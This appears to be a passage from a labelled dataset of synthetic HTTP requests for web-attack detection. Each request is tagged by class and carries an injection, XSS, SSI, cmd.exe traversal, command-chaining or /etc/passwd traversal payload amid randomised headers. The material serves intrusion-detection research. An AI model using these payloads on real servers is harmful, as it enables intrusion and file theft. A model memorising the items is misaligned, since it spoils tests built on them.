Date: Wed, 10 Mar 04 18:47:57 CET
ETag: W/"f.AsugJAgysLA_ZZECY"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Wed, 18 Oct 06 13:00:49 CET
If-Unmodified-Since: Tue, 08 Mar 05 02:05:43 GMT
If-Match: *
If-None-Match: ".MFOX6osgorjRS2M-j"
If-Range: Sat, 18 Jun 05 15:25:02 UTC
Max-Forwards: 54
Pragma: n1=ouhpba
Authorization: Basic YWdzcW51OlRldXNpZGc=
Range: 853-078834,3-3
Referer: /eeder.swf
TE: gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: iWOkZcNkqj http://www.aputNE.uk
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 8261x3395
Via: 4.4 www.eoatezc.gif:16570
Transfer-Encoding: identity
Warning: 616 205.175.245.132 "aielbrhgxemaihh" 
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36811
Start - Id: 49570
class: XPathInjection
GET /@4Y3C/eVXLu/X1usrxc7varWbod/n04/8Q/cdkY@kFyeVPUcMnM3/l439/ioJvVJsL6gdJ0@p3l/latdriuogrr.msf?edqhi9okynyhfaT=80309+or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+50687%3D&wqsdeiacNduterd=jx+re&Xd22kMH=%3Ea&aiiTemitn6rnle=682893 HTTP/1.1
Host: 80.158.18.61
Connection: close
Accept: application/zip;q=0.9
Accept-Charset: iso-2022-kr;q=0.0, windows-1252;q=0.5, x-mac-icelandic;q=0.9, utf-7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 27.25.46.254
Cookie: T_ZVV7e52Y=rwrgheowlsa9tt
Cookie2: $Version="6"
Date: Sat, 15 Nov 08 18:04:18 GMT
ETag: "BEeu9oNIpOCkdaWPzyls"
Expect: rai8lT=iouvqGee;fouiTcye=n37l
From: i5aux@ablaftejic.be
If-Modified-Since: Wed, 12 Dec 07 10:38:53 UTC
If-Unmodified-Since: Fri, 09 Nov 07 23:53:48 CET
If-Match: "lMf3_lfv-awJc@89w@"
If-None-Match: *
If-Range: Fri, 29 Dec 06 16:38:20 UTC
Max-Forwards: 9
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eeftuo sfagt=srres
Authorization: Digest realm
Range: -351866,-996363,00-
Referer: /ifned0l/9fada/eiesa.gif
TE: trailers
Trailer: Range
User-Agent: thbGvL http://www.tineanDu.org
UA-CPU: StrongARM
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: eso/3.0 154.226.69.16, HTTP/8.8 www.ypltEa.jpeg
Transfer-Encoding: 0bec; yErt=8T3mApj
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 4750592519886658439
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49570
Start - Id: 48293
class: XPathInjection
GET /uvhnACsliieapYieSSi/touThrebIR51soa9iee/wxcin5Z7J/ywohneme/sih8tIstj8acnesE7/CItKusrWc/c0aY.Av8ER3lB/oeee/a37XVZ9t20RQRc.jpg?AY8QlereplaceIO5=es%3D&yMYHNRcO1=rC_EY4v&odwkkRi7=weeaaS+si&aiwukenmbgAu=a&sh0fe1aouaper=Mieh2N+%2Faccess_logt&ls0Nasy=dbwI&ernceiT=Dr%29xtermeplhhngfcd&yrt=%3F+g%2Btbetweenbdf5aexrcpc%3Brha HTTP/1.1
Host: www.nmiesiYa6l.ch
Connection: keep-alive
Accept: */*
Accept-Encoding: *
Accept-Language: 00    or ilTxot/ec/x/child::node()[position()=84]    or 59=
Date: Sat, 17 May 08 19:00:41 UTC
If-Range: *
Referer: /u60hptec.mdb
TE: trailers,gzip
User-Agent: wcirDtztnysryaww
Transfer-Encoding: gzip
X-Forwarded-For: 50.28.189.18

null

End - Id: 48293
Start - Id: 48005
class: XSS
GET /eRabs.tfM/rOhkOSSG/sasAi/tkTphpd-nT/yQpotqHwL_f6DNbm/_K2linsert4tHbetweenJrBK/@PSXVQphpm4includexs/Krz/e1hbecsdihplbuhmAwbe.htm?4ceoogiqaMr9=Mnnexec&9r-9o=184&yna=onntOMdSNh71&ntmbal=650&var1UFQ=%5B%5CxC0%5D%5B%5CxBC%5Dscript%3E%5Balert+%28%275heFfemt%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+++%3E&YzqandBCN0=oto1mma&otdinsieoer=ts&ottla=be%3Amimgrm%3CmOuE&Nltvnpthtzinan8=289866&tcTlqmd=tusrAnermeeant&mt=si9sSntnlas&eEriag=751&Hvaccept4jgjTVFbn=060841681&oNp5rrjbroHlii=ECklslnup&nestisw3e=eyhm%3BsesgTt%27z HTTP/1.1
Host: 158.122.66.175
Connection: close
Accept: video/quicktime, text/plain, text/html;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: identity
Accept-Language: 8o-st24le, efs6-r, eintLa-ziLEh;q=0.6, ev-ecwchca;q=0.7, 7l3-zem
Cache-Control: no-cache
Client-ip: 192.143.189.93
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="40"
Date: Sun, 03 Sep 06 07:37:59 UTC
ETag: "wpRitPdByMlsrTEbXjXz"
Expect: btagiam=frsp
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Sat, 09 May 09 13:36:12 CET
If-Unmodified-Since: Thu, 26 Feb 09 04:40:56 CET
If-Match: "NPta-cuyFxM0kmidF"
If-None-Match: *
If-Range: Fri, 23 Nov 07 17:24:10 GMT
Max-Forwards: 5523
MIME-Version: 7.4
Pragma: n8rue5e=rkie
Proxy-Authorization: NTLM YWxlQWN1ZGJ6ZG5iZXJheXRodFJidXBlRXc2N2NibXBodHVLNWVqb0g=
Authorization: Digest algorithm=sinirvd
Range: 545-32,248-,104203-4203
Referer: http://yKvoH.com/3s2hz/tS8e1/nchI/eeoe/rutnHorr.asmx
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.4 (Windows; U; Win 9x 7.3; ts-cc; rv:9.7.1) Gecko/08534624
UA-CPU: StrongARM
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 948x768
Via: 4.1 www.tHyoonno.shtml:128, 0.9 www.stTtfns.shtml
Transfer-Encoding: c5Aso; ttrtmr=sOyvain
Upgrade: hrsloe/4.3
Warning: 599 www.Tcuswoi.shtml "3nnwcvtan" "Wed, 13 Dec 06 08:53:13 GMT"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48005
Start - Id: 44422
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.SoCeecir.fr:26606
Connection: close
Accept: audio/x-wav;q=0.8, audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nm-rteialts, itYyd-c0nbNro
Cache-Control: only-if-cached
Client-ip: 30.185.60.145
Cookie: Stnhjdaaaw0EDhs=t servicese 
Cookie2: $Version="352"
Date: Sat, 06 May 06 08:39:17 UTC
ETag: W/"pH3z7Lb_BNHVotjveEcj"
Expect: 100-continue
From: i1nh90u@tvpyl.biz
If-Modified-Since: Sat, 28 Jul 07 17:07:26 CET
If-Unmodified-Since: Tue, 09 Nov 04 13:12:12 UTC
If-Match: "hHQfop70q-1sGJ@tnRkC"
If-None-Match: *
If-Range: *
Max-Forwards: 1525
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: trsfr viToi9e=rhNharPn
Range: 6-02287,72753-
Referer: http://www.tlqmtt.be/sSaeb/ltnwa/hahuddqk/hpstohuO/aasl.html
TE: deflate,gzip;q=0.6
Trailer: Warning
User-Agent: edfmiii (oYIX_o7N; sj2CQWEx_; n5tuAEjI; aAJH_4m; jgtwbcdy8.)
UA-CPU: Sparc
UA-Disp: 015,480,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6396x837
Via: r0as/4.4 200.35.86.134
Transfer-Encoding: deflate
Upgrade: esoj5m/0.8
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 156.154.164.214
X-Serial-Number: 850961396
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44422
Start - Id: 39613
class: SSI
GET /iLa2ByNmFejR8UffR/ol8T2vm0dbYQDNu/nihak/I5/xfhE0MNFA/ls5mvSE1PRwiIcOG_Ljo/mhF9hbq@cBYG.gif?3form0O@F0@7o4=sR7Ran&gbsrtltoaid7mb=totltelnetEtdimae39t&rlloetdseo=insertneohavinggselect+limpne%3C&aih0ni3icef=46777539&in9eh9unaht=%3C%21--++++%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&4ffPP6h=5&c9e=hKMai8&r@x5diyrFy=tca.E&roukowrn=e0isuZCa1BBt&Ht=ayye&cmmi=%40biniwyn+thlsn0Rrhi&eahnfiEn4nlmanj=whereus%3AdcrN6 HTTP/1.0
Host: www.gqag.gov:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, identity;q=0.8
Accept-Language: z6a-1vzn;q=0.9, afafntq-deI;q=0.0, doiu8sk-9bpeu3gd, id-ehafQ
Cache-Control: max-age=2
Client-ip: 122.211.18.203
Cookie: tcr=m0stgottok;nOoatezhuhM=51692
Cookie2: $Version="651"
Date: Fri, 09 Apr 04 10:37:54 CET
ETag: "uJ3lTX1kx4DMc.p"
Expect: 100-continue
From: ts3vhh@kqzfn.com
If-Modified-Since: Tue, 17 Jul 07 04:04:30 CET
If-Unmodified-Since: Fri, 18 May 07 20:11:32 UTC
If-Match: *
If-None-Match: *
If-Range: "08my99QpmNFuY_JTS2"
Max-Forwards: 0
MIME-Version: 1.7
Pragma: ld=rius
Proxy-Authorization: Basic NXJzbzd0Om51bHJJN2k=
Authorization: Digest qop=uncT
Range: 973-,-4,32221-
Referer: http://rojln.ch/iEItenX/wdlsc/sabwid/brzOm.mdb
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 4.4; cg-oo; rv:1.6.7) Gecko/90418500
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: aei/0.2 147.239.213.20, 4.6 212.62.167.16:804
Transfer-Encoding: chiahw
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 025 www.keet.tiff "mDUtinismbsS" "Thu, 13 May 04 10:01:27 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39613
Start - Id: 46159
class: PathTransversal
GET /NodAAn8Legr/dnEo/feocjiw/6@Z4Ri/x5pFI7b6T0UvnaRfa/gAzo/s@WU8jfu_z3fcrbLpnP/GY_ERqEyS6@Vfrom3y.cgi?Bm=12&nIeaImaonoqlau=eaiatigurstan&issRpGL=rVt0-ZRSM&UorhV0AkechoG4=1817996&fi0hzeuw8=sqnTC6D&tunnocne1reW=0811&tcooob=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&nenlatexeU=it&e1tX=6125&wHfT.rMN8Zj6=et7t9e3nP&neowc1ldg=hfenUevaaybodicd HTTP/1.0
Host: www.esnxa.st
Connection: Sygtt
Accept: */*;q=0.9
Accept-Charset: iso-2022-kr;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=64
Client-ip: 172.17.95.67
Cookie: 6HXjx=6250;UddjphprUvbscript5=5;qctIsd2r9n=260u
Cookie2: $Version="5"
Date: Tue, 13 Apr 10 01:27:38 CET
ETag: "VfPdiXxvEuyVogNVe_"
Expect: 100-continue
From: ehreer@1nwhcp.uk
If-Modified-Since: Sun, 01 Jan 06 07:45:29 UTC
If-Unmodified-Since: Tue, 20 Nov 07 19:50:08 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic c21uYWl5YWo6bWV0bQ==
Authorization: Digest opaque="entieri"
Range: 542-,61-,33-
Referer: /2twoea/ximsAqu/kxnn/5eba3hmd.jsp
TE: trailers,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.1 (compatible; Konqueror/7.6; Linux i586; 6pibstie)
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 390x0476
Via: FTP/5.3 68.61.255.222, 9.5 147.168.55.62, 2.5 94.189.130.42
Transfer-Encoding: gzip
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 90.173.143.30
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46159
Start - Id: 47813
class: XSS
GET /1yai9y4oainf9Vseoet/tmoro/ti4arOteeItsaie/ne/tehopLLmsrtscn/nD3rKOp8TohsyoEh/kPZc3F5n3/JvJtxp_/enssorpan2t.js?oeezieelbr8eb=scriptalert%28mYy.tpie3%29script++ HTTP/1.0
Host: www.efgp.it
Connection: close
Accept: */*
Accept-Charset: windows-1252, koi8;q=0.7, macintosh
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 203.124.10.83
Cookie: reJ1nuepm=87388;MQ6RE1f=oig;05Z765.oFAhavingE=anETnpNscdH;XGY7Xv-httpunionF= htpass5c]ls-8tqeohr;ro1b8Wktmbqf=wo
Cookie2: $Version="5"
Date: Tue, 06 Dec 05 11:57:57 GMT
ETag: "cb8w5hhmsZL2xLnl0P0C"
Expect: WguInnoe
From: shnba@roottg.it
If-Modified-Since: Fri, 21 Dec 07 16:17:34 CET
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: "mXTKK6G1B_WP-tlrg"
If-Range: Wed, 18 Apr 07 14:05:50 UTC
Max-Forwards: 911
MIME-Version: 2.7
Pragma: re=eseww
Proxy-Authorization: Digest username="oaid"
Authorization: Digest nonce
Range: 2820-37,-5180,81-
Referer: /spaceeah/Ndr8oh/hieN.jsp
TE: trailers,chunked,gzip;q=0.5
Trailer: TE
User-Agent: mnrehqaecN (ePgfQY; vr7EVcwf@; tZGLZWn)
UA-CPU: x86
UA-Disp: 8203,202,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 628x152
Via: FTP/8.4 49.217.155.124
Transfer-Encoding: deflate
Upgrade: sejn/3.6
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 3578950
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47813
Start - Id: 44423
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.dneni5nate.it
Connection: keep-alive
Accept: video/*;q=0.5, image/gif;q=0.9
Accept-Charset: gb2312;q=0.6, iso-8859-9;q=0.1, shift_jis, euc-cn;q=0.3
Accept-Encoding: compress, gzip;q=0.4
Accept-Language: ttlchm-ir5etu
Cache-Control: only-if-cached
Client-ip: 82.62.123.205
Cookie: Stnhjdaaaw0EDhs=t servicese 
Cookie2: $Version="352"
Date: Sat, 06 May 06 08:39:17 UTC
ETag: W/"pH3z7Lb_BNHVotjveEcj"
Expect: 100-continue
From: i1nh90u@tvpyl.biz
If-Modified-Since: Sat, 28 Jul 07 17:07:26 CET
If-Unmodified-Since: Sat, 09 Apr 05 23:01:29 UTC
If-Match: "hQOO.YwZs1b3wzs_H"
If-None-Match: *
If-Range: *
Max-Forwards: 1525
MIME-Version: 6.2
Pragma: o=brtsHn
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: Basic NGVvYVI6ZTRwcnN1
Range: 6-02287,72753-
Referer: http://www.fretdhf.st/tTni5egs/a2hEtgN.doc
TE: deflate,gzip;q=0.6
Trailer: Accept-Encoding
User-Agent: biqi7/4.0.5
UA-CPU: Sparc
UA-Disp: 015,480,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6396x837
Via: 8.6 248.170.100.124:6
Transfer-Encoding: compress
Upgrade: esoj5m/0.8
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 156.154.164.214
X-Serial-Number: 850961396
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44423
Start - Id: 46519
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.0
Host: www.ke7s.be:22917
Connection: Juwbsh
Accept: application/x-tar;q=0.6, image/*;q=0.0
Accept-Charset: iso-8859-5, x-mac-roman, x-mac-cyrillic;q=0.1, x-mac-arabic
Accept-Encoding: *;q=0.0
Accept-Language: oj1s-aalnpbkt;q=0.0, reiioE-lf
Cache-Control: o='neha'
Client-ip: 44.240.178.88
Cookie: rtn9wiyuark=ehl~?weweallaeallalk&L;b;roOr=gimcnzso3rax;a1tc=nf9-Jt.e3Iy;N6xNeursEr=aVueu;hge9issNrn=inhe9ocrg
Cookie2: $Version="1"
Date: Fri, 29 Jul 05 14:52:41 UTC
ETag: "aNVJT2lKpqFCO9DMA"
Expect: 8enk=l68tr
From: eHTlcetd@ogsi0oerkl.biz
If-Modified-Since: Fri, 16 May 08 19:11:52 GMT
If-Unmodified-Since: Thu, 22 Sep 05 02:18:48 CET
If-Match: "sxa9XaWF5oOcwQJ3FF@h"
If-None-Match: "pxj_m.gXQ6E2vKg"
If-Range: Wed, 16 Jul 08 23:46:15 UTC
Max-Forwards: 7600
MIME-Version: 0.6
Pragma: S='ionaepTS'
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: NTLM d29nc2tzd2ZJbnlsZGNmY2l1dHQ3Z3FzYWdvNG9tZXNmb3RzVG5sdHpxN3Nlcg==
Range: -97604
Referer: http://www.ilva.it/ipit/3oiha.css
TE: chunked;q=0.5,gzip
Trailer: Pragma
User-Agent: aGgheNlht (gpQAY7aLR9; eYbtKJ)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: 1.6 www.voxewe.gif, HTTP/5.9 66.167.91.30, FTP/2.1 57.105.222.217
Transfer-Encoding: gzip
Upgrade: lAi/5.0, Nac/9.0, NeseBu/6.1, 6tswwc/0.1, it7Ey/2.3
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46519
Start - Id: 37752
class: LdapInjection
GET /OYn1/XBjk8doL/8TVwinntOFWB6/3l4/af1e0nsK9pq@N@XuC1vn/aq66S.asp?edghEsElgnl=saoI+6+Th%5DrdtotbinR&teuoae=yja&f8ex4tla=84144461&eNnnthn=79429429&5l=%26mh&oeIkuth4tae3=%29+%28+++%7C+%28++++cn%3D*o+++%27brien*+%29%28mail%3D*o++%27brien*++%29+&nuFFU1Azyc-=45761105&ntcdiecowh=1w4vreuls&0ole=enxmlioins HTTP/1.0
Host: www.d7mc5a9a.be:00
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesesimp;q=0.0
Accept-Encoding: gzip, compress;q=0.2, compress, identity;q=0.8
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 18.137.252.198
Cookie: XrkLbwDallxr9=lQCsJ;dTdst=84503120;XORtZn.9fkY=e8naisea7ttebt;EIYAKi=968165316
Cookie2: $Version="98"
Date: Fri, 04 Jan 08 07:16:51 UTC
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: 100-continue
From: Tnocerr@fsdzTjcit.de
If-Modified-Since: Tue, 18 Sep 07 13:11:51 GMT
If-Unmodified-Since: Wed, 27 Apr 05 11:55:22 GMT
If-Match: "TT0@dGZrYb7MKmHcoWF"
If-None-Match: "r0XA-A1E5jHQzyGng.d"
If-Range: *
Max-Forwards: 668
MIME-Version: 0.5
Pragma: no-cache
Authorization: NTLM dW1jdWFvZTVpeDN0bml0aUR1dHJ1bmRTaUl0dGxoZW9hcnJzMmd1cHJlbTVzZHA=
Range: 4950-512,415554-,190-
Referer: http://pMtaes.com/eaeSo/zC4taoee/ooen/lcvelHIn.pdf
TE: deflate,gzip;q=0.2,chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: sttAtn0/1.7.7.5.7
UA-CPU: MIPS
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 644x6409
Via: 8.1 161.241.62.170
Transfer-Encoding: deflate
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 4395839
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37752
Start - Id: 38615
class: LdapInjection
GET /aLO/Y6aMP8iframemYX/tUP9B2oOBGtbEh/fdMUvVth1U45os8dY/bJOgKoU/r3/includef0Jr/libDodocument.8wDB28VT/KMlk5Krcp7meta.cfm?csht5jrtiual=uleqsrt6&mee=twn%40&dhs0gh=autnrb%3Cne&g_9oirWPhttpsmg=uhho&XZchild1=e6b&aEsaoqxmveSeedn=1&doeeh4mhthnnd=%29%28%7C+++%28j2ih%3Djnb*%29&8dnvreRneoHin=dcO%2BArRehhhm&EGc6.IB0r9=ew8m9essrpmben&h9oem=71522 HTTP/1.1
Host: www.6s5mstS.org
Connection: moiae
Accept: image/*, video/mpeg;q=0.2, image/png
Accept-Charset: macintosh, koi8
Accept-Encoding: compress, identity, identity, identity, identity;q=0.5
Accept-Language: w-let;q=0.8
Cache-Control: max-age=8
Client-ip: 54.188.209.237
Cookie: 4re5uaMJAek9u=r28..80tVOh;tu=8ur;eitrkbpt=impm1OGa;wpsdlnihvtIf1=ex-jXLoD-P-;hta=wioCpitWuaehsmn
Cookie2: $Version="90"
Date: Mon, 02 Aug 04 06:25:14 GMT
ETag: W/"78VQV6Gzdd4iSe."
Expect: yEraech
From: RwOaaelp@gdhst.com
If-Modified-Since: Sat, 09 Feb 08 21:05:11 GMT
If-Unmodified-Since: Sun, 19 Nov 06 15:50:15 UTC
If-Match: "CFb1gS@mVaEbPOH"
If-None-Match: "sjSn5qbZ3i5NKpNA"
If-Range: "2nrs__Eu2QeAlWIfe7Y"
Max-Forwards: 0132
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: NTLM ZGk5aGVhQXRzdGRjZXlBaWd0ZXB0bzhuMG1ib3NvbnA2bG5h
Range: -348176
Referer: /wplzu.swf
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: laEtiHkW/6.8.9.0
UA-CPU: x86
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: 3.0 www.lntsudh.jpeg, FTP/4.1 8.52.254.109, 6.5 www.6egGeA.gif
Transfer-Encoding: identity
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 221 www.yahrm.jpeg "dsaeopr0wq2uo" "Thu, 14 Jul 05 01:23:19 CET"
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38615
Start - Id: 43499
class: OsCommanding
GET /tK8A_jg83/ZechopsCB_E.s2fsystem/te.N_kuRD2GS/lmyp6TMX/@zuktLHC/e8FYy07u.CB39suBk_.exe?92wet7d49yo=%29cd&nrreoe9taii=rhshutdownlteSft%401%27a&xa7e14tostksroi=sCZvzr&anAe4xseia=abetweennn&oitqk5oajtb=andw&pp@nDNando@OwF=nsyesletetAse&Mxd4cgRgita7=tshebyemyJ&hodELeMaz=+ucqrnaobYMA&qkeste=148768&bwUmS0P0-J=28634&hneieesheeseSo=6he3et&Daosnlil=TTmselect&tosj=h%28jew+s1ftduselectimg%29&iooimRuienrawh=7194121&pls4m28=+%3B+echo++++%3Bw+++%3B+uname++-a+++%3B++++id HTTP/1.1
Host: www.tuctu.ch:80
Connection: keep-alive
Accept: application/rtf, application/*;q=0.7, image/jpeg
Accept-Charset: *;q=0.6
Accept-Encoding: compress, compress
Accept-Language: iwn-n, nhrsaEn-stseg;q=0.5, qrAttat-0oou8r3g
Cache-Control: max-stale=29
Client-ip: 165.212.182.35
Cookie: Pp8noHi7nayle5=9095;0Adot=opun4Meen;tDideuHgL=ttrsmxx43aodmt;5O1uaot=$
Cookie2: $Version="514"
Date: Sat, 31 Jan 09 15:38:59 GMT
ETag: "i5b4tekVhyWTS7JAkw0"
Expect: reNwssAo=Iiubo;seruenh=eiwamf
From: ng6Ncd@ciehr.com
If-Modified-Since: Mon, 24 Sep 07 08:01:16 GMT
If-Unmodified-Since: Fri, 12 Jun 09 08:20:36 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1573
MIME-Version: 3.4
Pragma: lgnnp='fe'
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: NTLM ZXZ3Rm1lekVuNk9vbjZmdGZtcmRpc2RzaHRtOWVzdWlFaW5lSDdpb25sZGxl
Range: 32-61,4386-85
Referer: http://eeeo.it/AnstCem/ttwi.aspx
TE: trailers
Trailer: Referer
User-Agent: Mozilla/4.5 (X11; U; Unix 1.9; og-ma; rv:6.6.9) Gecko/11889452
UA-CPU: MIPS
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2941x889
Via: 5.8 33.148.210.176
Transfer-Encoding: identity
Upgrade: trzhel/9.1, tsfae/2.2
Warning: 030 157.207.32.92 "imad6oletnEdRcinytly" "Thu, 14 Apr 05 13:21:07 CET"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43499
Start - Id: 46004
class: PathTransversal
PUT /e6UprS5lmy1/rytpiryn/CPAQX/1.1gQyFgkaI/gA_O@NGpRdU.cfm? HTTP/1.0
Content-Length: 319
Content-Language: rIoe,tcSetBrh,it
Content-Encoding: identity
Content-Location: /twio/6fsili/eHo2.jpg
Content-MD5: NGhBbk1zYWFlSWV6dWlESQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Jun 06 05:40:35 CET
Last-Modified: Sat, 12 Dec 09 04:39:05 UTC
Host: 83.7.220.238
Connection: qewtaaeo
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: t-ecdo;q=0.4
Cache-Control: max-stale
Client-ip: 86.122.158.195
Cookie: @9-y=s3oGP-;sa5nuOheooi=..\..\..\..\..\..\WINDOWS\system.ini
Cookie2: $Version="57"
Date: Thu, 01 Jun 06 01:13:29 CET
Expect: 100-continue
From: tKcUisc@antaldEso0.cz
If-Modified-Since: Tue, 29 Aug 06 17:10:19 UTC
If-Unmodified-Since: Wed, 05 Nov 08 01:30:52 UTC
If-Match: *
Max-Forwards: 73
Pragma: no-cache
Proxy-Authorization: Basic ZGRsTnE6Z3V0cw==
Authorization: Basic c2l0ZUV0OnJFeGVlbmg=
Referer: /uroOa/par3lt/jhttohKl/namcq/gras1n36.swf
Trailer: Pragma
User-Agent: Mozilla/7.3 (Machintosh; U; PPC Mac OS X 1.6; mf-ed; rv:9.4.9) Gecko/48514051
UA-OS: Solaris
UA-Color: color8
Via: HTTP/0.1 229.214.143.99
Transfer-Encoding: gzip
----: -----------------------------------

